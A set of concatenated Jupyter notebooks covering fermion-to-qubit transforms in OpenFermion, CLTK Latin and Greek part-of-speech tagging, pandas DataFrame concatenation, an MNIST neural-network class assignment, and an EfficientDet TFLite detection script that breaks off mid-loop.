# It is possible to pick a clever encoder with the property that these sets have size $O(\log N)$. The corresponding transform will map annihilation operators to qubit operators with weight $O(\log N)$, which is much smaller than the $\Omega(N)$ weight associated with the JWT and parity transforms. This fact was noticed by [Bravyi and Kitaev](https://arxiv.org/abs/quant-ph/0003137), and later [Havlíček and others](https://arxiv.org/abs/1701.07072) pointed out that the encoder which achieves this is implemented by a classical data structure called a Fenwick tree. The transforms described in these two papers actually correspond to different variants of the Fenwick tree data structure and give different results when the total number of modes is not a power of 2. OpenFermion implements the one from the first paper as `bravyi_kitaev` and the one from the second paper as `bravyi_kitaev_tree`. Generally, the first one (`bravyi_kitaev`) is preferred because it results in operators with lower weight and is faster to compute.
#
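# To see where the $O(\log N)$ bound comes from, here is a sketch of a plain classical Fenwick tree (illustrative only; this is not OpenFermion's exact encoder): both the set of cells touched by an update and the set read by a prefix-sum query have at most about $\log_2 N + 1$ elements.

```python
import math

# Classical Fenwick tree index sets (1-indexed).
def update_set(i, n):          # cells touched when item i changes
    cells = []
    while i <= n:
        cells.append(i)
        i += i & -i            # jump to the next covering cell
    return cells

def query_set(i):              # cells read to get the prefix sum over 1..i
    cells = []
    while i > 0:
        cells.append(i)
        i -= i & -i            # strip the lowest set bit
    return cells

n = 1024
bound = int(math.log2(n)) + 1
assert all(len(update_set(i, n)) <= bound for i in range(1, n + 1))
assert all(len(query_set(i)) <= bound for i in range(1, n + 1))
```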
# Let's transform our previously instantiated Majorana operator using the Bravyi-Kitaev transform.
c_5_bk = bravyi_kitaev(c_5, n_modes)
print("c_5_bk = \n{}".format(c_5_bk))
# The advantage of the Bravyi-Kitaev transform is not apparent in a system with so few modes. Let's look at a system with 100 modes.
# +
n_modes = 100
# Initialize some Majorana operators
c_17 = FermionOperator('[17] + [17^]')
c_50 = FermionOperator('[50] + [50^]')
c_73 = FermionOperator('[73] + [73^]')
# Map to QubitOperators
c_17_jw = jordan_wigner(c_17)
c_50_jw = jordan_wigner(c_50)
c_73_jw = jordan_wigner(c_73)
c_17_parity = parity(c_17, n_modes)
c_50_parity = parity(c_50, n_modes)
c_73_parity = parity(c_73, n_modes)
c_17_bk = bravyi_kitaev(c_17, n_modes)
c_50_bk = bravyi_kitaev(c_50, n_modes)
c_73_bk = bravyi_kitaev(c_73, n_modes)
# Print some output
print("Jordan-Wigner\n"
"-------------")
print("c_17_jw = \n{}".format(c_17_jw))
print('')
print("c_50_jw = \n{}".format(c_50_jw))
print('')
print("c_73_jw = \n{}".format(c_73_jw))
print('')
print("Parity\n"
"------")
print("c_17_parity = \n{}".format(c_17_parity))
print('')
print("c_50_parity = \n{}".format(c_50_parity))
print('')
print("c_73_parity = \n{}".format(c_73_parity))
print('')
print("Bravyi-Kitaev\n"
"-------------")
print("c_17_bk = \n{}".format(c_17_bk))
print('')
print("c_50_bk = \n{}".format(c_50_bk))
print('')
print("c_73_bk = \n{}".format(c_73_bk))
# -
# Now let's go back to a system with 10 modes and check that the Bravyi-Kitaev transformed operators satisfy the expected relations.
# +
# Set the number of modes in the system
n_modes = 10
# Map FermionOperators to QubitOperators using the Bravyi-Kitaev transform
annihilate_2_bk = bravyi_kitaev(annihilate_2, n_modes)
create_2_bk = bravyi_kitaev(create_2, n_modes)
annihilate_5_bk = bravyi_kitaev(annihilate_5, n_modes)
create_5_bk = bravyi_kitaev(create_5, n_modes)
num_2_bk = bravyi_kitaev(num_2, n_modes)
num_5_bk = bravyi_kitaev(num_5, n_modes)
# Check the canonical anticommutation relations
assert anticommutator(annihilate_5_bk, annihilate_2_bk) == zero
assert anticommutator(annihilate_5_bk, annihilate_5_bk) == zero
assert anticommutator(annihilate_5_bk, create_2_bk) == zero
assert anticommutator(annihilate_5_bk, create_5_bk) == identity
# Check that the occupation number operators commute
assert commutator(num_2_bk, num_5_bk) == zero
# Print some output
print("annihilate_2_bk = \n{}".format(annihilate_2_bk))
print('')
print("create_2_bk = \n{}".format(create_2_bk))
print('')
print("annihilate_5_bk = \n{}".format(annihilate_5_bk))
print('')
print("create_5_bk = \n{}".format(create_5_bk))
print('')
print("num_2_bk = \n{}".format(num_2_bk))
print('')
print("num_5_bk = \n{}".format(num_5_bk))
|
docs/tutorials/jordan_wigner_and_bravyi_kitaev_transforms.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Latin
#
# For Latin POS tags, see https://github.com/cltk/latin_treebank_perseus.
# +
aen = """arma virumque cano, Troiae qui primus ab oris
Italiam, fato profugus, Laviniaque venit
litora, multum ille et terris iactatus et alto
vi superum saevae memorem Iunonis ob iram;
multa quoque et bello passus, dum conderet urbem, 5
inferretque deos Latio, genus unde Latinum,
Albanique patres, atque altae moenia Romae."""
# # rm line breaks
aen = aen.replace('\n',' ')
# -
print(aen)
from cltk.tag.pos import POSTag
tagger = POSTag('latin')
aen_tagged = tagger.tag_ngram_123_backoff(aen)
print(aen_tagged)
# +
# There are options, as the following
aen_tagged = tagger.tag_crf('Gallia est omnis divisa in partes tres')
# -
print(aen_tagged)
# # Greek
#
# For Greek POS tags, see https://github.com/cltk/greek_treebank_perseus.
athenaeus = "Ἀθήναιος μὲν ὁ τῆς βίβλου πατήρ· ποιεῖται δὲ τὸν λόγον πρὸς Τιμοκράτην· Δειπνοσοφιστὴς δὲ ταύτῃ τὸ ὄνομα. Ὑπόκειται δὲ τῷ λόγῳ Λαρήνσιος Ῥωμαῖος, ἀνὴρ τῇ τύχῃ περιφανής, τοὺς κατὰ πᾶσαν παιδείαν ἐμπειροτάτους ἐν αὑτοῦ δαιτυμόνας ποιούμενος·"
# +
from cltk.tag.pos import POSTag
tagger = POSTag('greek')
# Using another tagger
athenaeus_tagged = tagger.tag_tnt(athenaeus)
print(athenaeus_tagged)
|
8 Part-of-speech tagging.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
m = np.random.randint(1,30, size=(5,3))
df1 = pd.DataFrame(m, columns = ["var1", "var2", "var3"])
df1
# -
df2 = df1 + 99
df2
pd.concat([df1,df2]) # the index restarts from 0 in each piece, so labels repeat after concatenation
# + jupyter={"outputs_hidden": true}
# ?pd.concat
# -
pd.concat([df1,df2], ignore_index = True) # we checked the function's arguments; there was an index-related option, so we used it
# +
# if we had named the indexes ourselves we would want to keep them, so ignore_index would not be needed
# -
df2.columns = ["var1", "var2", "deg3"]
pd.concat([df1, df2]) # "deg3" is not shared by both frames, so pandas
# fills the missing values with NaN
pd.concat([df1, df2], join = "inner") # drops the non-shared columns and
# joins only on the intersection of the column sets
pd.concat([df1, df2]).reindex(columns = df1.columns)
# the old join_axes argument has been removed from recent pandas versions;
# reindex restricts the result to df1's columns instead
# var1 and var2 are common to both frames, but df1 has var3 while df2 has deg3;
# since we keep only df1's columns, var3 is retained and deg3 is dropped
# ?pd.concat
|
pandas_dataFrame_birlestirme_join_islemleri.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# assignment 6
# MSDS 422
# Professor <NAME>
# https://github.com/ageron/handson-ml/blob/master/10_introduction_to_artificial_neural_networks.ipynb
# https://github.com/ageron/handson-ml/blob/master/11_deep_learning.ipynb
# https://github.com/ageron/handson-ml/blob/master/12_distributed_tensorflow.ipynb
# more info
# https://www.datacamp.com/community/tutorials/cnn-tensorflow-python
# https://scikit-learn.org/stable/modules/generated/sklearn.neural_network.MLPClassifier.html
# really wonderful resource for noobs
# https://machinelearningmastery.com/rectified-linear-activation-function-for-deep-learning-neural-networks/
# -
# <div style="text-align: right"><b>pkg imports</b></div>
# +
# basics
import numpy as np
import pandas as pd
import seaborn as sns
import math
import random
import time
# prep
from sklearn.model_selection import train_test_split
from sklearn.model_selection import KFold
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import StandardScaler
#modeling
from sklearn.linear_model import Perceptron
from sklearn.neural_network import MLPClassifier
import tensorflow as tf
from keras.models import Sequential
from keras.layers import Flatten
from keras.layers import Dense
# other
# %matplotlib inline
import matplotlib.pyplot as plt
# -
# <div style="text-align: right"><b>configs, table setup</b></div>
# +
"""
for sci-kit:
‘identity’, no-op activation, useful to implement linear bottleneck, returns f(x) = x
‘logistic’, the logistic sigmoid function, returns f(x) = 1 / (1 + exp(-x)).
‘tanh’, the hyperbolic tan function, returns f(x) = tanh(x).
‘relu’, the rectified linear unit function, returns f(x) = max(0, x)
for tf/keras, the same, respectively:
linear
sigmoid
tanh
relu
also (with tf):
selu
"""
#sk_act_fun = "identity"
#sk_act_fun = "logistic"
sk_act_fun = "tanh"
#sk_act_fun = "relu"
tf_act_fun = "tanh"
# -
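# A quick numeric sketch (illustrative only) of the four activations listed above:

```python
import numpy as np

# Evaluate the four activation functions on a few sample inputs.
z = np.array([-2.0, 0.0, 2.0])

identity = z                       # f(x) = x
logistic = 1 / (1 + np.exp(-z))    # a.k.a. sigmoid in tf/keras
tanh_out = np.tanh(z)              # hyperbolic tangent
relu = np.maximum(0, z)            # rectified linear unit

assert np.allclose(identity, [-2., 0., 2.])
assert np.allclose(relu, [0., 0., 2.])
assert np.allclose(logistic[1], 0.5) and np.allclose(tanh_out[1], 0.0)
```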
pd.options.display.float_format = "{:,.4f}".format
RANDOM_SEED = 8675309
responseVar = "label"
# +
# setup for consolidated table, later
table = {"model 1":{"pkg":"sci-kit","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 2":{"pkg":"sci-kit","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 3":{"pkg":"sci-kit","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 4":{"pkg":"sci-kit","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 5":{"pkg":"tf/keras","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 6":{"pkg":"tf/keras","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 7":{"pkg":"tf/keras","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 8":{"pkg":"tf/keras","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None}
}
pd.DataFrame(table).transpose().head(2)
# -
# <div style="text-align: right"><b>defining things for model</b></div>
# +
# activation function
def sigmoid(z):
return 1 / (1 + np.exp(-z))
# lambda x: 1 / (1 + np.exp(-x))
# +
training_iters = 10
learning_rate = 0.01
b_size = 128
# MNIST data input (img shape: 28*28)
n_input = 28
# MNIST total classes (0-9 digits)
n_classes = 10
# -
# <div style="text-align: right"><b>data setup for scikit</b></div>
sk_mnist_train = pd.read_csv('train.csv')
sk_mnist_test = pd.read_csv('test.csv')
sk_mnist = pd.concat([sk_mnist_test, sk_mnist_train.drop(columns = "label")]) # combines the rows of 2 datasets
max(pd.DataFrame(sk_mnist.describe()).loc[["max"],])
pd.DataFrame(sk_mnist.describe()["pixel99"]).loc[["count","mean","std","min","max"],]
print("shape of the train set : ", sk_mnist_train.shape)
print("shape of the test set : ", sk_mnist_test.shape)
# 'test' data is our future data
sk_future_data = sk_mnist_test
sk_mnist = sk_mnist_train
del(sk_mnist_test)
del(sk_mnist_train)
# +
try:
sk_mnist_test
except NameError as e:
print(e) # meow
try:
sk_mnist_train
except NameError as e:
print(e) # meow
# -
#X = mnist_scaled.loc[:, mnist_scaled.columns != responseVar]
#y = mnist_scaled[responseVar]
sk_X = sk_mnist.loc[:, sk_mnist.columns != responseVar]
sk_y = sk_mnist[responseVar]
pd.DataFrame(sk_mnist.describe()["pixel774"]).loc[["count","mean","std","min","max"],]
scaler = StandardScaler()
sk_np_mnist_x = scaler.fit_transform(sk_X)
sk_X_scaled = pd.DataFrame(sk_np_mnist_x, index=sk_X.index, columns=sk_X.columns)
pd.DataFrame(sk_X_scaled.describe()["pixel774"]).loc[["count","mean","std","min","max"],]
sk_X_train, sk_X_test, sk_y_train, sk_y_test = train_test_split(sk_X_scaled, sk_y,
train_size=0.7,
test_size=0.3,
shuffle=True,
random_state=RANDOM_SEED)
# <div style="text-align: right"><b>data setup for tensorflow</b></div>
from keras.datasets import mnist
(tf_X_train, tf_y_train), (tf_X_test, tf_y_test) = mnist.load_data()
tf_X_valid, tf_X_train = tf_X_train[:5000] / 255.0, tf_X_train[5000:] / 255.0
tf_y_valid, tf_y_train = tf_y_train[:5000], tf_y_train[5000:]
tf_X_test = tf_X_test / 255.0
# <div style="text-align: right"><b>model 1 : 2x1. 2 layers w 1 neuron each. sci-kit</b></div>
print("approximate start time : ", time.asctime())
start1 = time.perf_counter()
twox1 = MLPClassifier(hidden_layer_sizes = (2, 1), # each tuple entry is the size of one hidden layer: here 2 neurons, then 1
activation = sk_act_fun,
                      alpha = learning_rate, # note: sklearn's alpha is an L2 penalty, not the learning rate (that is learning_rate_init)
batch_size = b_size).fit(sk_X_train,
sk_y_train)
stop1 = time.perf_counter()
tm1 = round(stop1 - start1)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm1)
print("time of execution in minutes : ", round(tm1/60, 1))
table["model 1"]["nbr_layers"] = "1"
table["model 1"]["nodes_p_layer"] = "2"
table["model 1"]["processing_time"] = tm1
table["model 1"]["testset_acc"] = twox1.score(sk_X_test, sk_y_test)
table["model 1"]["trainset_acc"] = twox1.score(sk_X_train, sk_y_train)
# <div style="text-align: right"><b>model 2 : 2x2. 2 layers w 2 neurons each. sci-kit</b></div>
print("approximate start time : ", time.asctime())
start2 = time.perf_counter()
twox2 = MLPClassifier(hidden_layer_sizes = (2, 2),
activation = sk_act_fun,
alpha = learning_rate,
batch_size = b_size).fit(sk_X_train,
sk_y_train)
stop2 = time.perf_counter()
tm2 = round(stop2 - start2)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm2)
print("time of execution in minutes : ", round(tm2/60, 1))
table["model 2"]["nbr_layers"] = "2"
table["model 2"]["nodes_p_layer"] = "2"
table["model 2"]["processing_time"] = tm2
table["model 2"]["testset_acc"] = twox2.score(sk_X_test, sk_y_test)
table["model 2"]["trainset_acc"] = twox2.score(sk_X_train, sk_y_train)
# <div style="text-align: right"><b>model 3 : 30x4. 30 layers w 4 neurons each. sci-kit</b></div>
print("approximate start time : ", time.asctime())
start3 = time.perf_counter()
thirtyx4 = MLPClassifier(hidden_layer_sizes = (30, 4),
activation = sk_act_fun,
alpha = learning_rate,
batch_size = b_size).fit(sk_X_train,
sk_y_train)
stop3 = time.perf_counter()
tm3 = round(stop3 - start3)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm3)
print("time of execution in minutes : ", round(tm3/60, 1))
table["model 3"]["nbr_layers"] = "30"
table["model 3"]["nodes_p_layer"] = "4"
table["model 3"]["processing_time"] = tm3
table["model 3"]["testset_acc"] = thirtyx4.score(sk_X_test, sk_y_test)
table["model 3"]["trainset_acc"] = thirtyx4.score(sk_X_train, sk_y_train)
# <div style="text-align: right"><b>model 4 : 4x30. 4 layers, each w 30 neurons. sci-kit</b></div>
print("approximate start time : ", time.asctime())
start4 = time.perf_counter()
fourx30 = MLPClassifier(hidden_layer_sizes = (4, 30),
activation = sk_act_fun,
alpha = learning_rate,
batch_size = b_size).fit(sk_X_train,
sk_y_train)
stop4 = time.perf_counter()
tm4 = round(stop4 - start4)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm4)
print("time of execution in minutes : ", round(tm4/60, 1))
table["model 4"]["nbr_layers"] = "4"
table["model 4"]["nodes_p_layer"] = "30"
table["model 4"]["processing_time"] = tm4
table["model 4"]["testset_acc"] = fourx30.score(sk_X_test, sk_y_test)
table["model 4"]["trainset_acc"] = fourx30.score(sk_X_train, sk_y_train)
# <div style="text-align: right"><b>model 5 : 2x1. 2 layers w 1 neuron each</b></div>
print("approximate start time : ", time.asctime())
start5 = time.perf_counter()
#classification MLP with two hidden layers
model5 = Sequential()
model5.add(Flatten(input_shape=[28, 28]))
model5.add(Dense(1, activation=tf_act_fun))
model5.add(Dense(1, activation=tf_act_fun))
model5.add(Dense(10, activation="softmax"))
model5.summary()
model5.compile(loss="sparse_categorical_crossentropy",
optimizer="sgd",
metrics=["accuracy"])
history5 = model5.fit(tf_X_train, tf_y_train, epochs=5,
validation_data=(tf_X_valid, tf_y_valid))
stop5 = time.perf_counter()
tm5 = round(stop5 - start5)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm5)
print("time of execution in minutes : ", round(tm5/60, 1))
table["model 5"]["nbr_layers"] = "2"
table["model 5"]["nodes_p_layer"] = "1"
table["model 5"]["processing_time"] = tm5
table["model 5"]["testset_acc"] = model5.evaluate(tf_X_test, tf_y_test)[1]
table["model 5"]["trainset_acc"] = model5.evaluate(tf_X_train, tf_y_train)[1]
# <div style="text-align: right"><b>model 6 : 2x2. 2 layers w 2 neurons each</b></div>
print("approximate start time : ", time.asctime())
start6 = time.perf_counter()
#classification MLP with two hidden layers
model6 = Sequential()
model6.add(Flatten(input_shape=[28, 28]))
model6.add(Dense(2, activation=tf_act_fun))
model6.add(Dense(2, activation=tf_act_fun))
model6.add(Dense(10, activation="softmax"))
model6.summary()
model6.compile(loss="sparse_categorical_crossentropy",
optimizer="sgd",
metrics=["accuracy"])
history6 = model6.fit(tf_X_train, tf_y_train, epochs=5,
validation_data=(tf_X_valid, tf_y_valid))
stop6 = time.perf_counter()
tm6 = round(stop6 - start6)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm6)
print("time of execution in minutes : ", round(tm6/60, 1))
table["model 6"]["nbr_layers"] = "2"
table["model 6"]["nodes_p_layer"] = "2"
table["model 6"]["processing_time"] = tm6
table["model 6"]["testset_acc"] = model6.evaluate(tf_X_test, tf_y_test)[1]
table["model 6"]["trainset_acc"] = model6.evaluate(tf_X_train, tf_y_train)[1]
# <div style="text-align: right"><b>model 7 : 30x4. 30 layers w 4 neurons each</b></div>
print("approximate start time : ", time.asctime())
start7 = time.perf_counter()
#classification MLP with a deep stack of 4-neuron hidden layers
model7 = Sequential()
model7.add(Flatten(input_shape=[28, 28]))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(10, activation="softmax"))
model7.summary()
model7.compile(loss="sparse_categorical_crossentropy",
optimizer="sgd",
metrics=["accuracy"])
history7 = model7.fit(tf_X_train, tf_y_train, epochs=30,
validation_data=(tf_X_valid, tf_y_valid))
stop7 = time.perf_counter()
tm7 = round(stop7 - start7)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm7)
print("time of execution in minutes : ", round(tm7/60, 1))
table["model 7"]["nbr_layers"] = "30"
table["model 7"]["nodes_p_layer"] = "4"
table["model 7"]["processing_time"] = tm7
table["model 7"]["testset_acc"] = model7.evaluate(tf_X_test, tf_y_test)[1]
table["model 7"]["trainset_acc"] = model7.evaluate(tf_X_train, tf_y_train)[1]
# <div style="text-align: right"><b>model 8 : 4x30. 4 layers w 30 neurons each</b></div>
print("approximate start time : ", time.asctime())
start8 = time.perf_counter()
#classification MLP with four hidden layers
model8 = Sequential()
model8.add(Flatten(input_shape=[28, 28]))
model8.add(Dense(30, activation=tf_act_fun))
model8.add(Dense(30, activation=tf_act_fun))
model8.add(Dense(30, activation=tf_act_fun))
model8.add(Dense(30, activation=tf_act_fun))
model8.add(Dense(10, activation="softmax"))
model8.summary()
model8.compile(loss="sparse_categorical_crossentropy",
optimizer="sgd",
metrics=["accuracy"])
history8 = model8.fit(tf_X_train, tf_y_train, epochs=12,
validation_data=(tf_X_valid, tf_y_valid))
stop8 = time.perf_counter()
tm8 = round(stop8 - start8)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm8)
print("time of execution in minutes : ", round(tm8/60, 1))
table["model 8"]["nbr_layers"] = "4"
table["model 8"]["nodes_p_layer"] = "30"
table["model 8"]["processing_time"] = tm8
table["model 8"]["testset_acc"] = model8.evaluate(tf_X_test, tf_y_test)[1]
table["model 8"]["trainset_acc"] = model8.evaluate(tf_X_train, tf_y_train)[1]
print("processing time in seconds : ")
pd.DataFrame(table).transpose()
|
Fall2020/MSDS422/mnist_data/asn6_tanh.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# +
import tensorflow as tf
tf.config.list_physical_devices('GPU')
# +
import tensorflow as tf
import cv2
import numpy as np
from PIL import Image
import os
import time
from configuration import Config
from core.efficientdet import EfficientDet, PostProcessing
from data.dataloader import DataLoader
# +
# original model
def idx2class():
return dict((v, k) for k, v in Config.pascal_voc_classes.items())
def draw_boxes_on_image(image, boxes, scores, classes):
num_boxes = boxes.shape[0]
for i in range(num_boxes):
class_and_score = str(idx2class()[classes[i]]) + ": " + str(scores[i])
cv2.rectangle(img=image, pt1=(boxes[i, 0], boxes[i, 1]), pt2=(boxes[i, 2], boxes[i, 3]), color=(255, 0, 0), thickness=2)
cv2.putText(img=image, text=class_and_score, org=(boxes[i, 0], boxes[i, 1] - 10), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=1.5, color=(0, 255, 255), thickness=2)
return image
def test_single_picture(picture_dir, model):
image_array = cv2.imread(picture_dir)
print(image_array.shape)
image = DataLoader.image_preprocess(is_training=False, image_dir=picture_dir)
image = tf.expand_dims(input=image, axis=0)
outputs = model(image, training=True)
post_process = PostProcessing()
boxes, scores, classes = post_process.testing_procedure(outputs, [image_array.shape[0], image_array.shape[1]])
# print("-"*50)
# print("boxes")
# print(boxes)
print("-" * 50)
print("scores")
print(scores)
# print("-" * 50)
# print("classes")
# print(classes)
# print("-" * 50)
image_with_boxes = draw_boxes_on_image(image_array, boxes.astype(np.int32), scores, classes)
return image_with_boxes
# def test_batch_picture(image_list, model):
# outputs = model(image_list_batch, training=True)
# post_process = PostProcessing()
# boxes = []
# scores = []
# classes = []
# for i in range(32):
# image_array = image_list[i]
# image = tf.expand_dims(input=image_array, axis=0)
# print(outputs[i].shape)
# print(image_list[i].shape)
# print( [ image_array.shape[0], image_array.shape[1]])
# boxes[i], scores[i], classes[i] = post_process.testing_procedure(outputs[i], [ image_array.shape[0], image_array.shape[1]])
# print("boxes : ", boxes.shape)
# print("scores : ", scores.shape)
# print("classes : ", classes.shape)
# image_with_boxes = draw_boxes_on_image(image_array, boxes.astype(np.int), scores, classes)
# return image_with_boxes
# def data_load(image_path):
# path = image_path
# count = 0
# image_list = []
# for item in os.listdir(path)[:32]:
# imgpath = path +'/' + item
# img = Image.open(imgpath)
# arr = np.array(img)
# image_list.append(arr)
# #img.save(str(count) + "output.png")
# count = count +1
# image_batch = tf.image.resize(image_list, (512,512))
# # image_temp = tf.data.Dataset.from_tensor_slices(image_list).batch(32).take(1)
# # image_batch = tf.image.resize(image_temp, (512,512))
# return image_batch
# +
if __name__ == '__main__':
# GPU settings
gpus = tf.config.list_physical_devices("GPU")
if gpus:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
#load_weights_from_epoch = Config.load_weights_from_epoch_quan
efficientdet = EfficientDet()
#efficientdet.load_weights(filepath=Config.save_model_dir + "saved_model")
load_weights_from_epoch = 100
efficientdet.load_weights(filepath=Config.best_model_dir+"epoch-{}".format(load_weights_from_epoch))
#efficientdet.load_weights(filepath=Config.best_model_dir+"epoch-{}_cus".format(load_weights_from_epoch))
#efficientdet.load_weights(filepath=Config.save_model_dir+"epoch-{}".format(load_weights_from_epoch))
#efficientdet.load_weights(filepath=Config.save_model_dir+"epoch-{}".format(load_weights_from_epoch))
# image_path = './data/fire_smoke/train/JPEGImages'
# image_list_batch = data_load(image_path)
# t1 = time.time()
# outputs = efficientdet(image_list_batch, training=True)
# t2 = time.time()
# print("------------------------------------")
# print(t2-t1)
# print(outputs.shape)
# image_output_list = test_batch_picture(image_list_batch, efficientdet)
# print(image_output_list.shape)
test_image_dir_1 = "./test_pictures/KakaoTalk_20211103_192433256.png"
# test_image_dir_2 = "./test_pictures/ck0kewsaha6hh07215jgx1bp2_jpeg.rf.1a375d20560d0de016bb524921f7b2a9.jpg"
# test_image_dir_3 = "./test_pictures/ck0kfhu4n8q7f0701ixmonyig_jpeg.rf.a3cc5282520b3bac90718bdd5528bd76.jpg"
# test_image_dir_4 = "./test_pictures/smoking_women.jpg"
image = test_single_picture(picture_dir=test_image_dir_1, model=efficientdet)
cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
cv2.imshow("detect result", image)
cv2.waitKey(0)
# image = test_single_picture(picture_dir=test_image_dir_2, model=efficientdet)
# cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
# cv2.imshow("detect result", image)
# cv2.waitKey(0)
# image = test_single_picture(picture_dir=test_image_dir_3, model=efficientdet)
# cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
# cv2.imshow("detect result", image)
# cv2.waitKey(0)
# image = test_single_picture(picture_dir=test_image_dir_4, model=efficientdet)
# print(image.shape)
# cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
# cv2.imshow("detect result", image)
# cv2.waitKey(0)
# -
cv2.imshow("detect result", image)
cv2.waitKey(0)
# +
# evaluating the tflite model
def idx2class():
return dict((v, k) for k, v in Config.pascal_voc_classes.items())
def draw_boxes_on_image(image, boxes, scores, classes):
num_boxes = boxes.shape[0]
for i in range(num_boxes):
class_and_score = str(idx2class()[classes[i]]) + ": " + str(scores[i])
cv2.rectangle(img=image, pt1=(boxes[i, 0], boxes[i, 1]), pt2=(boxes[i, 2], boxes[i, 3]), color=(255, 0, 0), thickness=2)
cv2.putText(img=image, text=class_and_score, org=(boxes[i, 0], boxes[i, 1] - 10), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=1.5, color=(0, 255, 255), thickness=2)
return image
def load_model(path):
interpreter = tf.lite.Interpreter(model_path = path)
interpreter.resize_tensor_input(0, [ 1 , 640, 640, 3])
# interpreter.resize_tensor_input(856, [ 1, 49104, 5])
interpreter.allocate_tensors()
return interpreter
def test_single_picture(picture_dir, model):
image_array = cv2.imread(picture_dir)
image = DataLoader.image_preprocess(is_training=False, image_dir=picture_dir)
image = tf.expand_dims(input=image, axis=0)
print(image.shape)
input_data = np.array(image, dtype = np.uint8)
input_details = model.get_input_details()[0]
output_details = model.get_output_details()[0]
model.set_tensor(input_details['index'], input_data)
model.invoke()
outputs= model.get_tensor(output_details['index'])
print(outputs)
# the original model outputs floats
# the quantized model's outputs are far too large.. need to fix the output_tensor shape
outputs = tf.constant(outputs)
post_process = PostProcessing()
boxes, scores, classes = post_process.testing_procedure(outputs, [image_array.shape[0], image_array.shape[1]])
print("-"*50)
print("boxes")
print(boxes)
print("-" * 50)
print("scores")
print(scores)
print("-" * 50)
print("classes")
print(classes)
print("-" * 50)
image_with_boxes = draw_boxes_on_image(image_array, boxes.astype(np.int), scores, classes)
return image_with_boxes
# -
def writeVideo():
video_capture = cv2.VideoCapture('rtsp://----------')
video_capture.set(3, 800)  # set the frame width
video_capture.set(4, 600)  # set the frame height
fps = 20
# get the frame width
streaming_window_width = int(video_capture.get(3))
# get the frame height
streaming_window_height = int(video_capture.get(4))
# variables for saving the file
path = f'D:/cctv/cctv/python/{fileName}.avi'
fourcc = cv2.VideoWriter_fourcc('X', 'V', 'I', 'D')
# +
gpus = tf.config.list_physical_devices("GPU")
if gpus:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
model_path = "./tflite_model_quant_D1_SGD.tflite"
efficientdet_lite = load_model(model_path)
cap = cv2.VideoCapture(args.camera_idx)
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
cv2_im = frame
cv2_im_rgb = cv2.cvtColor(cv2_im, cv2.COLOR_BGR2RGB)
